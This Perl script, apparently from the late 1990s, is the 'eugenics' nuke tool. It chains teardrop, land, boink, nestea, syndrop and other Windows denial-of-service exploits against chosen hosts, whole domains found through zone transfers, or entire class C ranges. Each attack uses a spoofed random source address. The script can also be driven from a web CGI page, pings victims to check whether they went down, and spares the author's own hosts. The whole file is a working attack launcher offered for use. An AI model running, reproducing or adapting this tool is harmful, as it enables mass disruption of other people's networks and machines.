#!/usr/bin/perl
#
# eugenics (tekniq nuke) v0.9.9.
# wh00p. there it is..
# vi's elite little nuke script..
# http://tekniq.net/nuke
#
# _okay.. let me explain this:_
#
# eugenics is a complex wrapper to normal win95/nt DoS attacks..
# it runs:
# flip, frag, land, jolt, boink, teardrop, newtear, ssping, and whatever
# else you feel the desire to add.. OKAY?!
# thanks.
#
#
# if you can't figure this out.. just run `nuke.pl -s' and it'll fix it.
#
# todo:
# x create a cgi interface for this script (built-in)
# x do error checking-reporting.
#
# ** THIS COMES WITH NO SUPPORT FROM THE AUTHOR (vi) **
# if you need extensive help.. just type nuke.pl -s
#
use Getopt::Std;
use File::Basename;
#use Net::Ping;
$| = 1;
$basedir = "/root/code/bin/";
$frag = $basedir . "frag";
$flip = $basedir . "flip";
$land = $basedir . "land";
$jolt = $basedir . "jolt";
$boink = $basedir . "boink";
$teardrop = $basedir . "teardrop";
$newtear = $basedir . "newtear";
$ssping = $basedir . "ssping";
$pure = $basedir . "vi-pure";
$akill = $basedir . "akill2";
$syndrop = $basedir . "syndrop";
$nestea = $basedir . "nestea";
$output = "/dev/null";
$SIG{INT} = 'abort';
$version = "0.9.9";
$i = 0;
$n = 0;
$percent = 0;
$quiet = 0;
$ipaddr = "3.1.33.7";
$numhosts = 0;
$argc = $#ARGV + 1;
$progname = basename($0);
$cgimode = 0;
$launchfile = '/www/rain/nuke-launch';
$cgihead = '/www/rain/nuke-head';
$cgifoot = '/www/rain/nuke-foot';
$nonexistant = 0;
$statdir = '/root/code/nukestat';
use vars qw($opt_q $opt_d $opt_h $opt_f $opt_s $opt_t $opt_c $opt_b $opt_p);
getopts("tqbhsc:d:f:p");
$quiet = $opt_q || 0;
# setting hosts not to attack.
$purtek = '(tekniq.net|blackcat.net|0.0.0.0|127.0.0.1|208.154.103.55|209.16.130|wa.dial-access.att.net|iquest.net)';
# generate a random ip to attack from.
srand time();
if (defined $opt_h) {
print STDERR "�[1;31meugenics $version.�[0m\n\n";
print STDERR "usage:\n$progname [-q] [-d <domain>] [-c <class C>] [-f <file>] [-h] [host] [host]..\n\n";
print STDERR "\t-q - quiet execution (for use with scripts)\n";
print STDERR "\t-d <domain> - nuke an entire domain\n";
print STDERR "\t-c <class C> - nuke an entire class C\n";
print STDERR "\t-f <file> - take input from a file\n";
print STDERR "\t-h - help\n\n";
exit 0;
}
if (defined $opt_s) {
unlink $0;
}
if ((defined $opt_d) || (defined $opt_c)) {
if (defined $opt_d) {
$domain = $opt_d;
print "�[H�[J" . "querying server for domain: $domain..\n";
open DOMAIN, "host -l $domain |";
while (<DOMAIN>) {
if ($_ =~ /has addr/) {
/(\S+)\s.*?(\d+\.\d+\.\d+\.\d+)$/;
$hostname = $1;
$hostip = $2;
if(($hostip !~ /$purtek/) && ($hostname !~ /$purtek/)) {
$hosthash{$hostname} = $hostip;
$numhosts++;
}
print "�[H" . "\n\n" . "�[J�[1;30m[�[0m" . "adding host " . $numhosts . " �[1;30m" . ".. " . "�[1;31m" . $hostname . "�[0m" . "(" . "�[1;31m" . $hostip . "�[0m" . ")" . "�[1;30m]�[0m" . "\n";
}
}
} else {
($a, $b, $c, $d) = split /\./, $opt_c;
for ($d=0; $d < 255 ; $d++) {
$host = join ".", $a,$b,$c,$d;
if($host !~ /$purtek/) {
$hosthash{$host} = $host;
}
}
}
} else {
if ( $argc == 0 ) {
if (defined $ENV{'QUERY_STRING'}) {
$cgimode = 1;
$quiet = 1;
if ($ENV{'QUERY_STRING'} ne "") {
$query_string = $ENV{'QUERY_STRING'};
$host = $ENV{'REMOTE_HOST'};
($one , $two) = split /=/, $query_string;
if (defined $two) {
$webhosts = $two;
} else {
$webhosts = $one;
}
@hosts = split /\+/, $webhosts;
system("/usr/bin/logger -t nuke '$webhosts nuked by $host'");
} else {
open LAUNCHFILE, $launchfile;
while (<LAUNCHFILE>) {
print;
}
exit(1);
}
} elsif ( defined $opt_f ) {
open NUKEFILE, $opt_f or die "can't open $opt_f: $!\n";
while (<NUKEFILE>) {
chomp;
if ($_ !~ /$purtek/) {
push @hosts, $_;
}
}
} else {
print "taking input from console.\n";
while (<STDIN>) {
chomp;
if ($_ !~ /$purtek/) {
push @hosts, $_;
}
}
}
} else {
while ($_ = pop @ARGV) {
if($_ !~ /$purtek/) {
push @hosts, $_;
}
}
}
if ($cgimode == 1) {
open CGIHEAD, $cgihead;
while (<CGIHEAD>) {
print;
}
close CGIHEAD;
print "querying dns server..<br><br>\n";
}
if ($quiet == 0) {
print "�[H�[J" . "querying dns server..\n";
}
foreach $hostname (@hosts) {
if ($quiet == 0) {
print "�[H" . "\n\n" . "�[J�[1;30m[�[0m" . "resolving host " . "�[1;30m" . ".. " . "�[1;31m" . $hostname . "�[1;30m]�[0m\n";
}
if ($hostname[0] =~ /^\d+\.\d+\.\d+\.\d+$/) {
$hostip = $hostname;
} else {
(undef, undef, undef, undef, @address) = gethostbyname($hostname);
next if (!@address);
($a, $b, $c, $d) = unpack('C4', $address[0]);
$hostip = join ".", $a, $b, $c, $d;
}
if ($quiet == 0) {
print "�[0m" . "(" . "�[1;31m" . $hostip . "�[0m" . ")" . "�[0m\n";
}
if(($hostip !~ /$purtek/) && ($hostname !~ /$purtek/)) {
$hosthash{$hostname} = $hostip;
} else {
print "�[1:31m" . "rejected." . "�[0m";
}
}
}
if ($quiet == 0) {
print "�[H�[J�[0meugenics $version�[0m\n";
}
$numhosts = keys %hosthash;
$noh = keys %hosthash;
$numlen = $noh =~ s/\d/\d/g;
if ($numhosts == 0) {
print "\n\n�[1;31merror:�[0m no hosts selected.\n\n";
exit(1);
}
foreach $hostname (keys %hosthash) {
$ipa = int rand 255;
$ipb = int rand 255;
$ipc = int rand 255;
$ipd = int rand 255;
$source = join ".", $ipa,$ipb,$ipc,$ipd;
$i++;
$percent = ($i / $numhosts) * 100;
$ipaddr = $hosthash{$hostname};
if (!(defined $opt_t)) {
if (defined $opt_p) {
open STATHOST, ">> $statdir/stats";
$p = Net::Ping->new("icmp");
if ($p->ping($ipaddr)) {
print STATHOST $hostname, "(", $ipaddr, ") ", time(), " alive\n";
} else {
print STATHOST $hostname, "(", $ipaddr, ") ", time(), " dead\n";
}
}
# sleep(1);
$exit{newtear} = system "$newtear $source $ipaddr -n 5 >> $output 2>&1";
$exit{frag} = system "$frag $source $ipaddr 5 >> $output 2>&1";
$exit{flip} = system "$flip $source $ipaddr 5 >> $output 2>&1";
$exit{boink} = system "$boink $source $ipaddr 25 65 5 >> $output 2>&1";
$exit{teardrop} = system "$teardrop $source $ipaddr -n 5 >> $output 2>&1";
$exit{land} = system "$land $ipaddr 23 >> $output 2>&1";
$exit{land} = system "$land $ipaddr 25 >> $output 2>&1";
$exit{land} = system "$land $ipaddr 113 >> $output 2>&1";
$exit{land} = system "$land $ipaddr 139 >> $output 2>&1";
$exit{ssping} = system "$ssping $source $ipaddr 5 >> $output 2>&1";
$exit{pure} = system "$pure $source $ipaddr >> $output 2>&1";
$exit{akill} = system "$akill $source $ipaddr >> $output 2>&1";
$exit{nestea} = system "$nestea $source $ipaddr -n 5 >> $output 2>&1";
$exit{syndrop} = system "$syndrop $source $ipaddr -n 5 >> $output 2>&1";
sleep(1);
# select(undef, undef, undef, 0.25);
if (defined $opt_p) {
sleep(1);
$p = Net::Ping->new("icmp");
if ($p->ping($ipaddr)) {
print STATHOST $hostname, "(", $ipaddr, ") ", time(), " alive\n";
} else {
print STATHOST $hostname, "(", $ipaddr, ") ", time(), " dead\n";
}
$p->close();
close STATHOST;
}
}
$attacks = keys %exit;
foreach $estatus (keys %exit) {
if ($exit{$estatus} == 32256) {
$nonexistant++;
}
}
print "\n";
if ($nonexistant == $attacks) {
print STDERR "\n�[1;31myou have no working exploits..\ngo edit this file.. and read.. smart one.�[0m\n\n";
exit (-1);
}
if ($quiet == 0) {
printf "�[H\n\n�[1;30m[�[1;31m%." . $numlen . "d/%d�[1;30m .. �[1;31m%.3d\%�[1;30m]�[0m\n", $i, $numhosts, $percent;
print "�[J�[1;30m[�[0;31m" . $source . " �[0;37m->�[1;31m " . $hostname . "�[0;37m" . "(" . "�[1;31m" . $ipaddr . "�[0;37m" . ")" . "�[1;30m]�[0m\n";
}
if ($cgimode == 1) {
print "[$source -> $hostname($ipaddr)]<br>\n";
}
}
if ($quiet == 0) {
print "\ndone.\n";
}
if ($cgimode == 1) {
print "done<blink>.</blink>\n";
open FOOTER, $cgifoot;
while (<FOOTER>) {
print;
}
}
if (defined $opt_b) {
printf "\a";
}
sub abort {
print STDERR "\n\n�[1;31maborted.. shutting down..�[0m\n\n";
exit(0);
}